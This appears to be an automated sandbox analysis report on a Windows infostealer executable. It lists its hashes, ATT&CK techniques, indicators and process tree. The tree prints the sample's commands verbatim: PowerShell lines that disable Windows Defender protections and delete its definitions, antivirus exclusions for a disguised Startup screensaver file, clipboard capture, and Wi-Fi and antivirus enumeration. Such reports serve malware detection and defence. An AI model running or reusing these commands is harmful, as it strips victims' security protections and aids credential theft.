da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-01-2025 03:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
Size

6.9MB
MD5

dd7004fc866d6f2872e0771b24d8d206
SHA1

adc25bdc1d43c2fe970870f3f1152029056591f2
SHA256

da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524
SHA512

bb64b65790b28cbf78723e49ff21ecfe6d081f41ccccbdc2df1d3ebbd52c05f3e623c49d45820307bd1218bd8412a5ef574870f28e22898f7dfbbdfa72e69dee
SSDEEP

98304:Hr7YzdbM+Q2y+RvK/+6jOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbLqledV1BqDS:Hr7e/vQOjmFQR4MVGFtwLPNledV1YnO

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3892	powershell.exe
3244	powershell.exe
4940	powershell.exe
4688	powershell.exe
4396	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
400	cmd.exe
3032	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3936	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1912	tasklist.exe
4816	tasklist.exe
2832	tasklist.exe
3448	tasklist.exe
812	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cd1-21.dat	upx
behavioral2/memory/3368-25-0x00007FFC0F9D0000-0x00007FFC0FFB9000-memory.dmp	upx
behavioral2/files/0x0007000000023cc4-28.dat	upx
behavioral2/files/0x0007000000023cc9-44.dat	upx
behavioral2/memory/3368-48-0x00007FFC28580000-0x00007FFC2858F000-memory.dmp	upx
behavioral2/files/0x0007000000023ccb-47.dat	upx
behavioral2/files/0x0007000000023cca-46.dat	upx
behavioral2/files/0x0007000000023cc8-43.dat	upx
behavioral2/files/0x0007000000023cc7-42.dat	upx
behavioral2/files/0x0007000000023cc6-41.dat	upx
behavioral2/files/0x0007000000023cc5-40.dat	upx
behavioral2/files/0x0007000000023cc3-39.dat	upx
behavioral2/files/0x0007000000023cd6-38.dat	upx
behavioral2/files/0x0007000000023cd5-37.dat	upx
behavioral2/files/0x0007000000023cd4-36.dat	upx
behavioral2/files/0x0007000000023cd0-33.dat	upx
behavioral2/files/0x0007000000023cce-32.dat	upx
behavioral2/files/0x0007000000023ccf-30.dat	upx
behavioral2/memory/3368-45-0x00007FFC229B0000-0x00007FFC229D3000-memory.dmp	upx
behavioral2/memory/3368-54-0x00007FFC1FAD0000-0x00007FFC1FAFD000-memory.dmp	upx
behavioral2/memory/3368-56-0x00007FFC25040000-0x00007FFC25059000-memory.dmp	upx
behavioral2/memory/3368-58-0x00007FFC1F8F0000-0x00007FFC1F913000-memory.dmp	upx
behavioral2/memory/3368-60-0x00007FFC1EE60000-0x00007FFC1EFD0000-memory.dmp	upx
behavioral2/memory/3368-62-0x00007FFC22B90000-0x00007FFC22BA9000-memory.dmp	upx
behavioral2/memory/3368-64-0x00007FFC25D20000-0x00007FFC25D2D000-memory.dmp	upx
behavioral2/memory/3368-66-0x00007FFC1F8C0000-0x00007FFC1F8EE000-memory.dmp	upx
behavioral2/memory/3368-72-0x00007FFC1EDA0000-0x00007FFC1EE58000-memory.dmp	upx
behavioral2/memory/3368-80-0x00007FFC0F470000-0x00007FFC0F58C000-memory.dmp	upx
behavioral2/memory/3368-78-0x00007FFC1FAC0000-0x00007FFC1FACD000-memory.dmp	upx
behavioral2/memory/3368-77-0x00007FFC22AB0000-0x00007FFC22AC4000-memory.dmp	upx
behavioral2/memory/3368-74-0x00007FFC0F650000-0x00007FFC0F9C9000-memory.dmp	upx
behavioral2/memory/3368-71-0x00007FFC229B0000-0x00007FFC229D3000-memory.dmp	upx
behavioral2/memory/3368-70-0x00007FFC0F9D0000-0x00007FFC0FFB9000-memory.dmp	upx
behavioral2/memory/3368-81-0x00007FFC1F8F0000-0x00007FFC1F913000-memory.dmp	upx
behavioral2/memory/3368-107-0x00007FFC1EE60000-0x00007FFC1EFD0000-memory.dmp	upx
behavioral2/memory/3368-110-0x00007FFC22B90000-0x00007FFC22BA9000-memory.dmp	upx
behavioral2/memory/3368-209-0x00007FFC1F8C0000-0x00007FFC1F8EE000-memory.dmp	upx
behavioral2/memory/3368-265-0x00007FFC1EDA0000-0x00007FFC1EE58000-memory.dmp	upx
behavioral2/memory/3368-269-0x00007FFC0F650000-0x00007FFC0F9C9000-memory.dmp	upx
behavioral2/memory/3368-284-0x00007FFC229B0000-0x00007FFC229D3000-memory.dmp	upx
behavioral2/memory/3368-283-0x00007FFC0F9D0000-0x00007FFC0FFB9000-memory.dmp	upx
behavioral2/memory/3368-298-0x00007FFC0F470000-0x00007FFC0F58C000-memory.dmp	upx
behavioral2/memory/3368-289-0x00007FFC1EE60000-0x00007FFC1EFD0000-memory.dmp	upx
behavioral2/memory/3368-320-0x00007FFC0F9D0000-0x00007FFC0FFB9000-memory.dmp	upx
behavioral2/memory/3368-348-0x00007FFC0F470000-0x00007FFC0F58C000-memory.dmp	upx
behavioral2/memory/3368-347-0x00007FFC1FAC0000-0x00007FFC1FACD000-memory.dmp	upx
behavioral2/memory/3368-346-0x00007FFC22AB0000-0x00007FFC22AC4000-memory.dmp	upx
behavioral2/memory/3368-345-0x00007FFC1EDA0000-0x00007FFC1EE58000-memory.dmp	upx
behavioral2/memory/3368-344-0x00007FFC1F8C0000-0x00007FFC1F8EE000-memory.dmp	upx
behavioral2/memory/3368-343-0x00007FFC25D20000-0x00007FFC25D2D000-memory.dmp	upx
behavioral2/memory/3368-342-0x00007FFC22B90000-0x00007FFC22BA9000-memory.dmp	upx
behavioral2/memory/3368-341-0x00007FFC1EE60000-0x00007FFC1EFD0000-memory.dmp	upx
behavioral2/memory/3368-340-0x00007FFC1F8F0000-0x00007FFC1F913000-memory.dmp	upx
behavioral2/memory/3368-339-0x00007FFC25040000-0x00007FFC25059000-memory.dmp	upx
behavioral2/memory/3368-338-0x00007FFC1FAD0000-0x00007FFC1FAFD000-memory.dmp	upx
behavioral2/memory/3368-337-0x00007FFC229B0000-0x00007FFC229D3000-memory.dmp	upx
behavioral2/memory/3368-336-0x00007FFC28580000-0x00007FFC2858F000-memory.dmp	upx
behavioral2/memory/3368-335-0x00007FFC0F650000-0x00007FFC0F9C9000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3460	cmd.exe
3896	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4068	WMIC.exe
4268	WMIC.exe
2840	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3900	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3892	powershell.exe
3892	powershell.exe
4940	powershell.exe
4940	powershell.exe
3244	powershell.exe
3244	powershell.exe
3032	powershell.exe
3032	powershell.exe
3600	powershell.exe
3600	powershell.exe
3032	powershell.exe
3600	powershell.exe
4688	powershell.exe
4688	powershell.exe
1620	powershell.exe
1620	powershell.exe
4396	powershell.exe
4396	powershell.exe
3644	powershell.exe
3644	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4216	WMIC.exe
Token: SeSecurityPrivilege	4216	WMIC.exe
Token: SeTakeOwnershipPrivilege	4216	WMIC.exe
Token: SeLoadDriverPrivilege	4216	WMIC.exe
Token: SeSystemProfilePrivilege	4216	WMIC.exe
Token: SeSystemtimePrivilege	4216	WMIC.exe
Token: SeProfSingleProcessPrivilege	4216	WMIC.exe
Token: SeIncBasePriorityPrivilege	4216	WMIC.exe
Token: SeCreatePagefilePrivilege	4216	WMIC.exe
Token: SeBackupPrivilege	4216	WMIC.exe
Token: SeRestorePrivilege	4216	WMIC.exe
Token: SeShutdownPrivilege	4216	WMIC.exe
Token: SeDebugPrivilege	4216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4216	WMIC.exe
Token: SeRemoteShutdownPrivilege	4216	WMIC.exe
Token: SeUndockPrivilege	4216	WMIC.exe
Token: SeManageVolumePrivilege	4216	WMIC.exe
Token: 33	4216	WMIC.exe
Token: 34	4216	WMIC.exe
Token: 35	4216	WMIC.exe
Token: 36	4216	WMIC.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	4816	tasklist.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeIncreaseQuotaPrivilege	4216	WMIC.exe
Token: SeSecurityPrivilege	4216	WMIC.exe
Token: SeTakeOwnershipPrivilege	4216	WMIC.exe
Token: SeLoadDriverPrivilege	4216	WMIC.exe
Token: SeSystemProfilePrivilege	4216	WMIC.exe
Token: SeSystemtimePrivilege	4216	WMIC.exe
Token: SeProfSingleProcessPrivilege	4216	WMIC.exe
Token: SeIncBasePriorityPrivilege	4216	WMIC.exe
Token: SeCreatePagefilePrivilege	4216	WMIC.exe
Token: SeBackupPrivilege	4216	WMIC.exe
Token: SeRestorePrivilege	4216	WMIC.exe
Token: SeShutdownPrivilege	4216	WMIC.exe
Token: SeDebugPrivilege	4216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4216	WMIC.exe
Token: SeRemoteShutdownPrivilege	4216	WMIC.exe
Token: SeUndockPrivilege	4216	WMIC.exe
Token: SeManageVolumePrivilege	4216	WMIC.exe
Token: 33	4216	WMIC.exe
Token: 34	4216	WMIC.exe
Token: 35	4216	WMIC.exe
Token: 36	4216	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4068	WMIC.exe
Token: SeSecurityPrivilege	4068	WMIC.exe
Token: SeTakeOwnershipPrivilege	4068	WMIC.exe
Token: SeLoadDriverPrivilege	4068	WMIC.exe
Token: SeSystemProfilePrivilege	4068	WMIC.exe
Token: SeSystemtimePrivilege	4068	WMIC.exe
Token: SeProfSingleProcessPrivilege	4068	WMIC.exe
Token: SeIncBasePriorityPrivilege	4068	WMIC.exe
Token: SeCreatePagefilePrivilege	4068	WMIC.exe
Token: SeBackupPrivilege	4068	WMIC.exe
Token: SeRestorePrivilege	4068	WMIC.exe
Token: SeShutdownPrivilege	4068	WMIC.exe
Token: SeDebugPrivilege	4068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4068	WMIC.exe
Token: SeRemoteShutdownPrivilege	4068	WMIC.exe
Token: SeUndockPrivilege	4068	WMIC.exe
Token: SeManageVolumePrivilege	4068	WMIC.exe
Token: 33	4068	WMIC.exe
Token: 34	4068	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 3368	1996	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	85
PID 1996 wrote to memory of 3368	1996	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	85
PID 3368 wrote to memory of 4880	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	86
PID 3368 wrote to memory of 4880	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	86
PID 3368 wrote to memory of 2476	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	87
PID 3368 wrote to memory of 2476	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	87
PID 3368 wrote to memory of 5052	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	90
PID 3368 wrote to memory of 5052	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	90
PID 3368 wrote to memory of 1276	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	92
PID 3368 wrote to memory of 1276	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	92
PID 2476 wrote to memory of 4940	2476	cmd.exe	94
PID 2476 wrote to memory of 4940	2476	cmd.exe	94
PID 4880 wrote to memory of 3892	4880	cmd.exe	95
PID 4880 wrote to memory of 3892	4880	cmd.exe	95
PID 5052 wrote to memory of 4816	5052	cmd.exe	96
PID 5052 wrote to memory of 4816	5052	cmd.exe	96
PID 1276 wrote to memory of 4216	1276	cmd.exe	97
PID 1276 wrote to memory of 4216	1276	cmd.exe	97
PID 3368 wrote to memory of 4044	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	99
PID 3368 wrote to memory of 4044	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	99
PID 4044 wrote to memory of 4556	4044	cmd.exe	101
PID 4044 wrote to memory of 4556	4044	cmd.exe	101
PID 3368 wrote to memory of 4124	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	102
PID 3368 wrote to memory of 4124	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	102
PID 4124 wrote to memory of 516	4124	cmd.exe	104
PID 4124 wrote to memory of 516	4124	cmd.exe	104
PID 3368 wrote to memory of 2024	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	105
PID 3368 wrote to memory of 2024	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	105
PID 2024 wrote to memory of 4068	2024	cmd.exe	107
PID 2024 wrote to memory of 4068	2024	cmd.exe	107
PID 3368 wrote to memory of 3836	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	108
PID 3368 wrote to memory of 3836	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	108
PID 3836 wrote to memory of 4268	3836	cmd.exe	154
PID 3836 wrote to memory of 4268	3836	cmd.exe	154
PID 3368 wrote to memory of 3620	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	111
PID 3368 wrote to memory of 3620	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	111
PID 3620 wrote to memory of 3244	3620	cmd.exe	113
PID 3620 wrote to memory of 3244	3620	cmd.exe	113
PID 3368 wrote to memory of 4672	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	114
PID 3368 wrote to memory of 4672	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	114
PID 3368 wrote to memory of 2840	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	115
PID 3368 wrote to memory of 2840	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	115
PID 4672 wrote to memory of 2832	4672	cmd.exe	119
PID 4672 wrote to memory of 2832	4672	cmd.exe	119
PID 2840 wrote to memory of 3448	2840	cmd.exe	118
PID 2840 wrote to memory of 3448	2840	cmd.exe	118
PID 3368 wrote to memory of 3460	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	120
PID 3368 wrote to memory of 3460	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	120
PID 3368 wrote to memory of 1416	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	121
PID 3368 wrote to memory of 1416	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	121
PID 3368 wrote to memory of 772	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	122
PID 3368 wrote to memory of 772	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	122
PID 3368 wrote to memory of 400	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	124
PID 3368 wrote to memory of 400	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	124
PID 3368 wrote to memory of 2876	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	123
PID 3368 wrote to memory of 2876	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	123
PID 3368 wrote to memory of 232	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	125
PID 3368 wrote to memory of 232	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	125
PID 3368 wrote to memory of 4628	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	127
PID 3368 wrote to memory of 4628	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	127
PID 3368 wrote to memory of 2424	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	133
PID 3368 wrote to memory of 2424	3368	da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe	133
PID 772 wrote to memory of 1628	772	cmd.exe	136
PID 772 wrote to memory of 1628	772	cmd.exe	136

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1612	attrib.exe
2248	attrib.exe

C:\Users\Admin\AppData\Local\Temp\da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
"C:\Users\Admin\AppData\Local\Temp\da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Users\Admin\AppData\Local\Temp\da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe
  "C:\Users\Admin\AppData\Local\Temp\da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1276
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4044
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4124
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ‌.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ‌.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2840
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3460
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1416
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:772
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:232
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4628
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4896
- - C:\Windows\system32\cmd.exe
